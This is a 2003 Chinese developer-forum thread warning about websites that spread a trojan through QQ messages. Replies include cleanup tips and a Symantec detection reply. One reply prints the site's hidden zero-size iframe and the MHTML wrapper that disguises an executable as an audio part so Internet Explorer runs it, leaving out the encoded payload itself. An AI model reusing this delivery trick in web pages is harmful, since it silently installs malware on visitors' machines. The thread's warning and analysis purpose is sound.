9,506
社区成员
发帖
与我相关
我的任务
分享中秋检举 一个恶意网站!
www.qqmq.com这个网站非常可恶,无论IE修复什么的都没什么用
更可恨的是它使你在用QQ时不小心就把这个网址发给了好友,然后好友一点URL也中了。它里面的内容里这样的写的:hoho,http://www.mmqm.com刚才我朋友给我的好东东,你不看就后悔。。。
更可恨的是它使你在用QQ时不小心就把这个网址发给了好友,然后好友一点URL也中了。它里面的内容里这样的写的:hoho,http://www.mmqm.com刚才我朋友给我的好东东,你不看就后悔。。。
...全文
请发表友善的回复…
发表回复
yyshow 2003-09-26
- 打赏
- 举报
谢谢楼上的朋友。
实践中我也发现了另一种方法,详情请看http://www.hao123.com/iebak/index.htm
希望能给其余朋友带来方便。
QQ:264322161欢迎交流
实践中我也发现了另一种方法,详情请看http://www.hao123.com/iebak/index.htm
希望能给其余朋友带来方便。
QQ:264322161欢迎交流
zhllwarez 2003-09-25
- 打赏
- 举报
http://ktv530.com病毒分析:
http://expert.csdn.net/Expert/topic/2290/2290784.xml?temp=.2702753
http://expert.csdn.net/Expert/topic/2290/2290784.xml?temp=.2702753
yyshow 2003-09-25
- 打赏
- 举报
现在又发现一个http://ktv530.com的,它也会qq不知不觉发给好友,只要点击一下好友头像就会发过去,而且这样打开后IE都无法修复
期待方法。。。
期待方法。。。
yyshow 2003-09-23
- 打赏
- 举报
中了毒的电脑,至今都无法用QQ,因为一用QQ它就会把这段话不经意的发给别人,害人啊
zhllwarez 2003-09-23
- 打赏
- 举报
www.mmqqzhangfei.com 没有这个网址
zhoupj01 2003-09-23
- 打赏
- 举报
这个就更厉害了!
www.mmqqzhangfei.com
www.mmqqzhangfei.com
zwindw 2003-09-18
- 打赏
- 举报
这种人见了就应该千刀万割!!!
让他死无全尸。。。
不过话又说回来了。。
这说明人爱拽有拽的资本嘛。呵:)
就像美国。。
谁不讨厌他。
但人家还不是一样活得自由。潇洒·!!!
让他死无全尸。。。
不过话又说回来了。。
这说明人爱拽有拽的资本嘛。呵:)
就像美国。。
谁不讨厌他。
但人家还不是一样活得自由。潇洒·!!!
lian2003 2003-09-17
- 打赏
- 举报
up
zwindw 2003-09-16
- 打赏
- 举报
up!!!!
AK_huang 2003-09-16
- 打赏
- 举报
关注
yinshulin 2003-09-13
- 打赏
- 举报
我也看了此网站没有什么反应呀,不明白
yinshulin 2003-09-13
- 打赏
- 举报
好像是爱情森林病毒吧,用专杀工具看看有没有用
lanqiu 2003-09-13
- 打赏
- 举报
up
CppFile 2003-09-12
- 打赏
- 举报
我也提交到norton 了,不久就可以查出来了,这样的网站我要见一个查一个,让他没的混
plake 2003-09-12
- 打赏
- 举报
up
zhllwarez 2003-09-12
- 打赏
- 举报
www.qqmq.com好像没什么特殊,倒是这个http://www.mmqm.com有点问题,看这个:
<iframe src=http://www.mmqm.com/adsms/sms/new.mht width=0 height=0 frameborder=0 scrolling=NO></iframe>
这是它的主页面第一行,包含了一个恶意框架,下面打开new.mht看看:
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====B===="
--====B====
Content-Type: multipart/alternative;
boundary="====A===="
--====A====
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<iframe src=3Dcid:Mud height=3D0 width=3D0>
</iframe>
--====A====--
--====B====
Content-Type: audio/x-wav;
name="mmqm.exe"
Content-Transfer-Encoding: base64
Content-ID: <Mud>
下面base64编码的exe文件体我就不再列举,原来是一个木马程序。
至此,页面代码的险恶用心已经暴露无遗了。
=========地狱未空 誓不成佛=========
<iframe src=http://www.mmqm.com/adsms/sms/new.mht width=0 height=0 frameborder=0 scrolling=NO></iframe>
这是它的主页面第一行,包含了一个恶意框架,下面打开new.mht看看:
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====B===="
--====B====
Content-Type: multipart/alternative;
boundary="====A===="
--====A====
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<iframe src=3Dcid:Mud height=3D0 width=3D0>
</iframe>
--====A====--
--====B====
Content-Type: audio/x-wav;
name="mmqm.exe"
Content-Transfer-Encoding: base64
Content-ID: <Mud>
下面base64编码的exe文件体我就不再列举,原来是一个木马程序。
至此,页面代码的险恶用心已经暴露无遗了。
=========地狱未空 誓不成佛=========
dmzn 2003-09-12
- 打赏
- 举报
先检查一下后台的进程有没有可疑的,然后删掉注册表中的启动项。注意的是:software\winnt下也有一个项是可以开机启动的。
CppFile 2003-09-12
- 打赏
- 举报
Dear allen allen,
We have analyzed your submission. The following is a report of our
findings for each file you have submitted:
filename: C:\Documents and Settings\k\桌面\wbk3A.tmp.wav
machine: ESILK-CG
result: This file is infected with Trojan Horse
Developer notes:
C:\Documents and Settings\k\桌面\wbk3A.tmp.wav is non-repairable threat. NAV with the latest beta definition detects this. Please delete this file and replace it if neccessary. Please follow the instruction at the end of this email message to install the latest beta definitions.
Symantec Security Response has determined that the sample(s) that you provided are infected with a virus, worm, or Trojan. We have created beta definitions that will detect this threat. Please follow the instruction at the end of this email message to download and install the latest beta definitions.
Downloading and Installing Beta Definition Instructions:
1. Open your Web browser. If you are using a dial-up connection, connect to any Web site, such as: http://securityresponse.symantec.com/
////////////////////注意//////////////////////////////////
2. Click this link to the ftp site: ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/beta/symcbetadefsx86.exe. If it does not go to the site (this could take a minute or so if you have a slow connection), copy and paste the address into the address bar of your Web browser and then press Enter.
////////////////////注意//////////////////////////////////
3. When a download dialog box appears, save the file to the Windows desktop.
4. Double-click the downloaded file and follow the prompts.
----------------------------------------------------------------------
This message was generated by Symantec Security Response automation
Should you have any questions about your submission, please contact
our regional technical support from the Symantec website
(http://www.symantec.com/techsupp/)
and give them the tracking number in the subject of this message.
落吨的反映很快,马上就回信了 ,不过新的病毒定义可能还没有出来,你可以到上边的ftp地址去下载杀除工具。
We have analyzed your submission. The following is a report of our
findings for each file you have submitted:
filename: C:\Documents and Settings\k\桌面\wbk3A.tmp.wav
machine: ESILK-CG
result: This file is infected with Trojan Horse
Developer notes:
C:\Documents and Settings\k\桌面\wbk3A.tmp.wav is non-repairable threat. NAV with the latest beta definition detects this. Please delete this file and replace it if neccessary. Please follow the instruction at the end of this email message to install the latest beta definitions.
Symantec Security Response has determined that the sample(s) that you provided are infected with a virus, worm, or Trojan. We have created beta definitions that will detect this threat. Please follow the instruction at the end of this email message to download and install the latest beta definitions.
Downloading and Installing Beta Definition Instructions:
1. Open your Web browser. If you are using a dial-up connection, connect to any Web site, such as: http://securityresponse.symantec.com/
////////////////////注意//////////////////////////////////
2. Click this link to the ftp site: ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/beta/symcbetadefsx86.exe. If it does not go to the site (this could take a minute or so if you have a slow connection), copy and paste the address into the address bar of your Web browser and then press Enter.
////////////////////注意//////////////////////////////////
3. When a download dialog box appears, save the file to the Windows desktop.
4. Double-click the downloaded file and follow the prompts.
----------------------------------------------------------------------
This message was generated by Symantec Security Response automation
Should you have any questions about your submission, please contact
our regional technical support from the Symantec website
(http://www.symantec.com/techsupp/)
and give them the tracking number in the subject of this message.
落吨的反映很快,马上就回信了 ,不过新的病毒定义可能还没有出来,你可以到上边的ftp地址去下载杀除工具。
sadforlove 2003-09-12
- 打赏
- 举报
关注
gglnxw 2003-09-12
- 打赏
- 举报
我路过,学习中。。。。。。
加载更多回复(3)
